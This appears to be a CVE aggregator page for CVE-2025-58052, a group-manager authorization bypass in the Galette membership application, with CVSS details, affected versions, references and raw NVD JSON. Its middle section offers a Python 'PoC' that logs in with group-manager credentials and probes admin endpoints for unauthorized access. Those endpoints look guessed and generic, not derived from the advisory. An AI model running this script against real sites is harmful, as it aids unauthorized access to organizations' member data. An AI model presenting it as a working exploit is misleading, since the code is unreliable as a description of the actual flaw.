CVE-2025-58052

Description

Galette is a membership management web application for non profit organizations. Starting in version 0.9.6 and prior to version 1.2.0, attackers with group manager role can bypass intended restrictions allowing unauthorized access and changes despite role-based controls. Since it requires privileged access initially, exploitation is restricted to malicious insiders or compromised group managers accounts. Version 1.2.0 fixes the issue.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:galette:galette:*:*:*:*:*:*:*:* - VULNERABLE

Galette 0.9.6 <= version < 1.2.0

Galette 0.9.6

Galette 0.9.7

Galette 0.9.8

Galette 0.9.9

Galette 1.0.0

Galette 1.0.x

Galette 1.1.0

Galette 1.1.x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-58052 PoC - Galette权限绕过漏洞
# 需要有效的组管理员账户凭证

import requests
import json

TARGET_URL = "http://target-galette-instance.com"
USERNAME = "attacker_group_manager"
PASSWORD = "compromised_password"

def exploit_privilege_bypass():
    """
    利用Galette组管理员权限绕过漏洞访问未授权资源
    """
    session = requests.Session()
    
    # Step 1: 登录获取会话
    login_data = {
        "login": USERNAME,
        "password": PASSWORD
    }
    response = session.post(f"{TARGET_URL}/login", data=login_data)
    
    if response.status_code != 200:
        print("[-] 登录失败")
        return
    
    print("[+] 成功登录为组管理员")
    
    # Step 2: 尝试访问受保护的API端点（正常情况下组管理员无权访问）
    protected_endpoints = [
        "/api/admin/users",
        "/api/admin/settings",
        "/api/admin/configurations",
        "/admin/full_access_users"
    ]
    
    for endpoint in protected_endpoints:
        response = session.get(f"{TARGET_URL}{endpoint}")
        
        if response.status_code == 200:
            print(f"[!] 权限绕过成功: {endpoint}")
            print(f"[+] 响应内容: {response.text[:500]}")
        elif response.status_code == 403:
            print(f"[-] 访问被拒绝: {endpoint}")
        else:
            print(f"[*] 状态码: {response.status_code} - {endpoint}")

if __name__ == "__main__":
    exploit_privilege_bypass()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-58052
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-58052
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-58052/
[4] VulDB https://vuldb.com/cve/CVE-2025-58052
[5] https://github.com/galette/galette/security/advisories/GHSA-gp9g-gf56-fcxx

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-58052", "sourceIdentifier": "[email protected]", "published": "2025-12-19T17:15:52.293", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Galette is a membership management web application for non profit organizations. Starting in version 0.9.6 and prior to version 1.2.0, attackers with group manager role can bypass intended restrictions allowing unauthorized access and changes despite role-based controls. Since it requires privileged access initially, exploitation is restricted to malicious insiders or compromised group managers accounts. Version 1.2.0 fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:galette:galette:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.2.0", "matchCriteriaId": "C73ECAC2-D9C6-439D-B19F-9D21D0A4FFAD"}]}]}], "references": [{"url": "https://github.com/galette/galette/security/advisories/GHSA-gp9g-gf56-fcxx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}